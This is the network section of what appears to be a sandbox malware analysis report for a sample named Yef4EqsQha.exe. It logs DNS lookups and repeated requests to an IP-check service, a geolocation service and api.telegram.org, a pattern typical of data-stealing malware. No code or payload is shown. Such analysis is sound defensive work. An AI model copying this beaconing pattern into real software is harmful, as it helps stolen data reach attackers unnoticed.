                                                                                                            TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                            Jan 10, 2025 23:06:15.253376007 CET192.168.2.71.1.1.10x8511Standard query (0)time.windows.comA (IP address)IN (0x0001)false
                                                                                                            Jan 10, 2025 23:06:23.155838013 CET192.168.2.71.1.1.10xea3Standard query (0)checkip.dyndns.orgA (IP address)IN (0x0001)false
                                                                                                            Jan 10, 2025 23:06:24.705132008 CET192.168.2.71.1.1.10xa57eStandard query (0)reallyfreegeoip.orgA (IP address)IN (0x0001)false
                                                                                                            Jan 10, 2025 23:06:35.759605885 CET192.168.2.71.1.1.10x5020Standard query (0)api.telegram.orgA (IP address)IN (0x0001)false
                                                                                                            Jan 10, 2025 23:07:10.113006115 CET192.168.2.71.1.1.10x6a32Standard query (0)api.telegram.orgA (IP address)IN (0x0001)false

                                                                                                            DNS Answers

                                                                                                            TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                            Jan 10, 2025 23:06:15.260225058 CET1.1.1.1192.168.2.70x8511No error (0)time.windows.comtwc.trafficmanager.netCNAME (Canonical name)IN (0x0001)false
                                                                                                            Jan 10, 2025 23:06:18.002077103 CET1.1.1.1192.168.2.70x5b9aNo error (0)shed.dual-low.s-part-0017.t-0009.t-msedge.nets-part-0017.t-0009.t-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                                            Jan 10, 2025 23:06:18.002077103 CET1.1.1.1192.168.2.70x5b9aNo error (0)s-part-0017.t-0009.t-msedge.net13.107.246.45A (IP address)IN (0x0001)false
                                                                                                            Jan 10, 2025 23:06:23.163252115 CET1.1.1.1192.168.2.70xea3No error (0)checkip.dyndns.orgcheckip.dyndns.comCNAME (Canonical name)IN (0x0001)false
                                                                                                            Jan 10, 2025 23:06:23.163252115 CET1.1.1.1192.168.2.70xea3No error (0)checkip.dyndns.com193.122.6.168A (IP address)IN (0x0001)false
                                                                                                            Jan 10, 2025 23:06:23.163252115 CET1.1.1.1192.168.2.70xea3No error (0)checkip.dyndns.com132.226.247.73A (IP address)IN (0x0001)false
                                                                                                            Jan 10, 2025 23:06:23.163252115 CET1.1.1.1192.168.2.70xea3No error (0)checkip.dyndns.com193.122.130.0A (IP address)IN (0x0001)false
                                                                                                            Jan 10, 2025 23:06:23.163252115 CET1.1.1.1192.168.2.70xea3No error (0)checkip.dyndns.com158.101.44.242A (IP address)IN (0x0001)false
                                                                                                            Jan 10, 2025 23:06:23.163252115 CET1.1.1.1192.168.2.70xea3No error (0)checkip.dyndns.com132.226.8.169A (IP address)IN (0x0001)false
                                                                                                            Jan 10, 2025 23:06:24.712431908 CET1.1.1.1192.168.2.70xa57eNo error (0)reallyfreegeoip.org104.21.112.1A (IP address)IN (0x0001)false
                                                                                                            Jan 10, 2025 23:06:24.712431908 CET1.1.1.1192.168.2.70xa57eNo error (0)reallyfreegeoip.org104.21.32.1A (IP address)IN (0x0001)false
                                                                                                            Jan 10, 2025 23:06:24.712431908 CET1.1.1.1192.168.2.70xa57eNo error (0)reallyfreegeoip.org104.21.64.1A (IP address)IN (0x0001)false
                                                                                                            Jan 10, 2025 23:06:24.712431908 CET1.1.1.1192.168.2.70xa57eNo error (0)reallyfreegeoip.org104.21.48.1A (IP address)IN (0x0001)false
                                                                                                            Jan 10, 2025 23:06:24.712431908 CET1.1.1.1192.168.2.70xa57eNo error (0)reallyfreegeoip.org104.21.16.1A (IP address)IN (0x0001)false
                                                                                                            Jan 10, 2025 23:06:24.712431908 CET1.1.1.1192.168.2.70xa57eNo error (0)reallyfreegeoip.org104.21.96.1A (IP address)IN (0x0001)false
                                                                                                            Jan 10, 2025 23:06:24.712431908 CET1.1.1.1192.168.2.70xa57eNo error (0)reallyfreegeoip.org104.21.80.1A (IP address)IN (0x0001)false
                                                                                                            Jan 10, 2025 23:06:35.766526937 CET1.1.1.1192.168.2.70x5020No error (0)api.telegram.org149.154.167.220A (IP address)IN (0x0001)false
                                                                                                            Jan 10, 2025 23:06:38.578043938 CET1.1.1.1192.168.2.70xaa02No error (0)bg.microsoft.map.fastly.net199.232.210.172A (IP address)IN (0x0001)false
                                                                                                            Jan 10, 2025 23:06:38.578043938 CET1.1.1.1192.168.2.70xaa02No error (0)bg.microsoft.map.fastly.net199.232.214.172A (IP address)IN (0x0001)false
                                                                                                            Jan 10, 2025 23:06:51.981551886 CET1.1.1.1192.168.2.70xdddaNo error (0)bg.microsoft.map.fastly.net199.232.210.172A (IP address)IN (0x0001)false
                                                                                                            Jan 10, 2025 23:06:51.981551886 CET1.1.1.1192.168.2.70xdddaNo error (0)bg.microsoft.map.fastly.net199.232.214.172A (IP address)IN (0x0001)false
                                                                                                            Jan 10, 2025 23:07:10.119829893 CET1.1.1.1192.168.2.70x6a32No error (0)api.telegram.org149.154.167.220A (IP address)IN (0x0001)false
                                                                                                            Jan 10, 2025 23:09:34.771842003 CET1.1.1.1192.168.2.70x85f4No error (0)bg.microsoft.map.fastly.net199.232.214.172A (IP address)IN (0x0001)false
                                                                                                            Jan 10, 2025 23:09:34.771842003 CET1.1.1.1192.168.2.70x85f4No error (0)bg.microsoft.map.fastly.net199.232.210.172A (IP address)IN (0x0001)false
                                                                                                            Jan 10, 2025 23:09:40.572637081 CET1.1.1.1192.168.2.70x9c30No error (0)bg.microsoft.map.fastly.net199.232.210.172A (IP address)IN (0x0001)false
                                                                                                            Jan 10, 2025 23:09:40.572637081 CET1.1.1.1192.168.2.70x9c30No error (0)bg.microsoft.map.fastly.net199.232.214.172A (IP address)IN (0x0001)false

                                                                                                            HTTP Request Dependency Graph

                                                                                                            • reallyfreegeoip.org
                                                                                                            • api.telegram.org
                                                                                                            • checkip.dyndns.org

                                                                                                            HTTP Packets

                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            0192.168.2.749732193.122.6.168807872C:\Users\user\Desktop\Yef4EqsQha.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            Jan 10, 2025 23:06:23.174691916 CET151OUTGET / HTTP/1.1
                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                            Host: checkip.dyndns.org
                                                                                                            Connection: Keep-Alive
                                                                                                            Jan 10, 2025 23:06:24.460573912 CET273INHTTP/1.1 200 OK
                                                                                                            Date: Fri, 10 Jan 2025 22:06:24 GMT
                                                                                                            Content-Type: text/html
                                                                                                            Content-Length: 104
                                                                                                            Connection: keep-alive
                                                                                                            Cache-Control: no-cache
                                                                                                            Pragma: no-cache
                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>
                                                                                                            Jan 10, 2025 23:06:24.464193106 CET127OUTGET / HTTP/1.1
                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                            Host: checkip.dyndns.org
                                                                                                            Jan 10, 2025 23:06:24.663239956 CET273INHTTP/1.1 200 OK
                                                                                                            Date: Fri, 10 Jan 2025 22:06:24 GMT
                                                                                                            Content-Type: text/html
                                                                                                            Content-Length: 104
                                                                                                            Connection: keep-alive
                                                                                                            Cache-Control: no-cache
                                                                                                            Pragma: no-cache
                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>
                                                                                                            Jan 10, 2025 23:06:25.595396996 CET127OUTGET / HTTP/1.1
                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                            Host: checkip.dyndns.org
                                                                                                            Jan 10, 2025 23:06:25.783324957 CET273INHTTP/1.1 200 OK
                                                                                                            Date: Fri, 10 Jan 2025 22:06:25 GMT
                                                                                                            Content-Type: text/html
                                                                                                            Content-Length: 104
                                                                                                            Connection: keep-alive
                                                                                                            Cache-Control: no-cache
                                                                                                            Pragma: no-cache
                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            1192.168.2.749757193.122.6.168807872C:\Users\user\Desktop\Yef4EqsQha.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            Jan 10, 2025 23:06:26.409161091 CET127OUTGET / HTTP/1.1
                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                            Host: checkip.dyndns.org
                                                                                                            Jan 10, 2025 23:06:27.053514004 CET273INHTTP/1.1 200 OK
                                                                                                            Date: Fri, 10 Jan 2025 22:06:26 GMT
                                                                                                            Content-Type: text/html
                                                                                                            Content-Length: 104
                                                                                                            Connection: keep-alive
                                                                                                            Cache-Control: no-cache
                                                                                                            Pragma: no-cache
                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            2192.168.2.749770193.122.6.168807872C:\Users\user\Desktop\Yef4EqsQha.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            Jan 10, 2025 23:06:27.672051907 CET151OUTGET / HTTP/1.1
                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                            Host: checkip.dyndns.org
                                                                                                            Connection: Keep-Alive
                                                                                                            Jan 10, 2025 23:06:28.323019028 CET273INHTTP/1.1 200 OK
                                                                                                            Date: Fri, 10 Jan 2025 22:06:28 GMT
                                                                                                            Content-Type: text/html
                                                                                                            Content-Length: 104
                                                                                                            Connection: keep-alive
                                                                                                            Cache-Control: no-cache
                                                                                                            Pragma: no-cache
                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            3192.168.2.749779193.122.6.168807872C:\Users\user\Desktop\Yef4EqsQha.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            Jan 10, 2025 23:06:29.243932009 CET151OUTGET / HTTP/1.1
                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                            Host: checkip.dyndns.org
                                                                                                            Connection: Keep-Alive
                                                                                                            Jan 10, 2025 23:06:29.871208906 CET273INHTTP/1.1 200 OK
                                                                                                            Date: Fri, 10 Jan 2025 22:06:29 GMT
                                                                                                            Content-Type: text/html
                                                                                                            Content-Length: 104
                                                                                                            Connection: keep-alive
                                                                                                            Cache-Control: no-cache
                                                                                                            Pragma: no-cache
                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            4192.168.2.749790193.122.6.168807872C:\Users\user\Desktop\Yef4EqsQha.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            Jan 10, 2025 23:06:30.472919941 CET151OUTGET / HTTP/1.1
                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                            Host: checkip.dyndns.org
                                                                                                            Connection: Keep-Alive
                                                                                                            Jan 10, 2025 23:06:31.113214970 CET273INHTTP/1.1 200 OK
                                                                                                            Date: Fri, 10 Jan 2025 22:06:31 GMT
                                                                                                            Content-Type: text/html
                                                                                                            Content-Length: 104
                                                                                                            Connection: keep-alive
                                                                                                            Cache-Control: no-cache
                                                                                                            Pragma: no-cache
                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            5192.168.2.749801193.122.6.168807872C:\Users\user\Desktop\Yef4EqsQha.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            Jan 10, 2025 23:06:31.844506979 CET151OUTGET / HTTP/1.1
                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                            Host: checkip.dyndns.org
                                                                                                            Connection: Keep-Alive
                                                                                                            Jan 10, 2025 23:06:32.475076914 CET273INHTTP/1.1 200 OK
                                                                                                            Date: Fri, 10 Jan 2025 22:06:32 GMT
                                                                                                            Content-Type: text/html
                                                                                                            Content-Length: 104
                                                                                                            Connection: keep-alive
                                                                                                            Cache-Control: no-cache
                                                                                                            Pragma: no-cache
                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            6192.168.2.749811193.122.6.168807872C:\Users\user\Desktop\Yef4EqsQha.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            Jan 10, 2025 23:06:33.107426882 CET151OUTGET / HTTP/1.1
                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                            Host: checkip.dyndns.org
                                                                                                            Connection: Keep-Alive
                                                                                                            Jan 10, 2025 23:06:33.734648943 CET273INHTTP/1.1 200 OK
                                                                                                            Date: Fri, 10 Jan 2025 22:06:33 GMT
                                                                                                            Content-Type: text/html
                                                                                                            Content-Length: 104
                                                                                                            Connection: keep-alive
                                                                                                            Cache-Control: no-cache
                                                                                                            Pragma: no-cache
                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            7192.168.2.749821193.122.6.168807872C:\Users\user\Desktop\Yef4EqsQha.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            Jan 10, 2025 23:06:34.342881918 CET151OUTGET / HTTP/1.1
                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                            Host: checkip.dyndns.org
                                                                                                            Connection: Keep-Alive
                                                                                                            Jan 10, 2025 23:06:35.012502909 CET273INHTTP/1.1 200 OK
                                                                                                            Date: Fri, 10 Jan 2025 22:06:34 GMT
                                                                                                            Content-Type: text/html
                                                                                                            Content-Length: 104
                                                                                                            Connection: keep-alive
                                                                                                            Cache-Control: no-cache
                                                                                                            Pragma: no-cache
                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                            HTTPS Proxied Packets

                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            0192.168.2.749744104.21.112.14437872C:\Users\user\Desktop\Yef4EqsQha.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            2025-01-10 22:06:25 UTC85OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                                                            Host: reallyfreegeoip.org
                                                                                                            Connection: Keep-Alive
                                                                                                            2025-01-10 22:06:25 UTC857INHTTP/1.1 200 OK
                                                                                                            Date: Fri, 10 Jan 2025 22:06:25 GMT
                                                                                                            Content-Type: text/xml
                                                                                                            Content-Length: 362
                                                                                                            Connection: close
                                                                                                            Age: 1861574
                                                                                                            Cache-Control: max-age=31536000
                                                                                                            cf-cache-status: HIT
                                                                                                            last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=kKFVMrN0chdDFX%2ByYayWl9ymUXPCGvOZSvqa%2FORBHUZaGrBX5QzFfZ9lr%2F4jwZl55g0oSRQq3rlbSX14gbX7YiLNxF4EQ3iuDJ6z4Lae1spR8xFKIfAyQ%2FsXDkTmjimQ6xr5SHAs"}],"group":"cf-nel","max_age":604800}
                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                            Server: cloudflare
                                                                                                            CF-RAY: 8ffff9604cdc43b3-EWR
                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1579&min_rtt=1569&rtt_var=609&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2847&recv_bytes=699&delivery_rate=1766485&cwnd=203&unsent_bytes=0&cid=0eccfcdb911abc40&ts=217&x=0"
                                                                                                            2025-01-10 22:06:25 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                            Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            1192.168.2.749751104.21.112.14437872C:\Users\user\Desktop\Yef4EqsQha.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            2025-01-10 22:06:26 UTC61OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                                                            Host: reallyfreegeoip.org
                                                                                                            2025-01-10 22:06:26 UTC859INHTTP/1.1 200 OK
                                                                                                            Date: Fri, 10 Jan 2025 22:06:26 GMT
                                                                                                            Content-Type: text/xml
                                                                                                            Content-Length: 362
                                                                                                            Connection: close
                                                                                                            Age: 1861575
                                                                                                            Cache-Control: max-age=31536000
                                                                                                            cf-cache-status: HIT
                                                                                                            last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=KS3%2BoRDUtOmMdQ3p0%2BdsYTdUYsbInvz%2FvJ3DiiaVTNRLxLEjA96pW8EFoGgEVWpS4yNsYjEsWF2R1wa790sHG7yIuuHAf5mYlrTcWUP9PN3YhoO2mguZ6%2F0j3eDAatf8ePTBTi%2BR"}],"group":"cf-nel","max_age":604800}
                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                            Server: cloudflare
                                                                                                            CF-RAY: 8ffff9669e12424b-EWR
                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1606&min_rtt=1587&rtt_var=609&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2847&recv_bytes=699&delivery_rate=1839949&cwnd=248&unsent_bytes=0&cid=9825ce997dde88ba&ts=141&x=0"
                                                                                                            2025-01-10 22:06:26 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                            Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            2192.168.2.749764104.21.112.14437872C:\Users\user\Desktop\Yef4EqsQha.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            2025-01-10 22:06:27 UTC85OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                                                            Host: reallyfreegeoip.org
                                                                                                            Connection: Keep-Alive
                                                                                                            2025-01-10 22:06:27 UTC857INHTTP/1.1 200 OK
                                                                                                            Date: Fri, 10 Jan 2025 22:06:27 GMT
                                                                                                            Content-Type: text/xml
                                                                                                            Content-Length: 362
                                                                                                            Connection: close
                                                                                                            Age: 1861576
                                                                                                            Cache-Control: max-age=31536000
                                                                                                            cf-cache-status: HIT
                                                                                                            last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=h9ncgwhDlIPOCJL%2FXOOoXvbbPNw7T22YanQ4LL7Op%2BNqV4qgz7IqWPk%2FCxjTDAtaVnGkYz9joGeyWu3Sg1g9wk7BRs6hSiRsiP3xliL9tDv5oq1csBDW%2FT3CiKGNlfY3QhPfYIjX"}],"group":"cf-nel","max_age":604800}
                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                            Server: cloudflare
                                                                                                            CF-RAY: 8ffff96e7b5f729f-EWR
                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1897&min_rtt=1896&rtt_var=714&sent=3&recv=5&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1530398&cwnd=169&unsent_bytes=0&cid=e6eba409e175d3fd&ts=136&x=0"
                                                                                                            2025-01-10 22:06:27 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                            Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


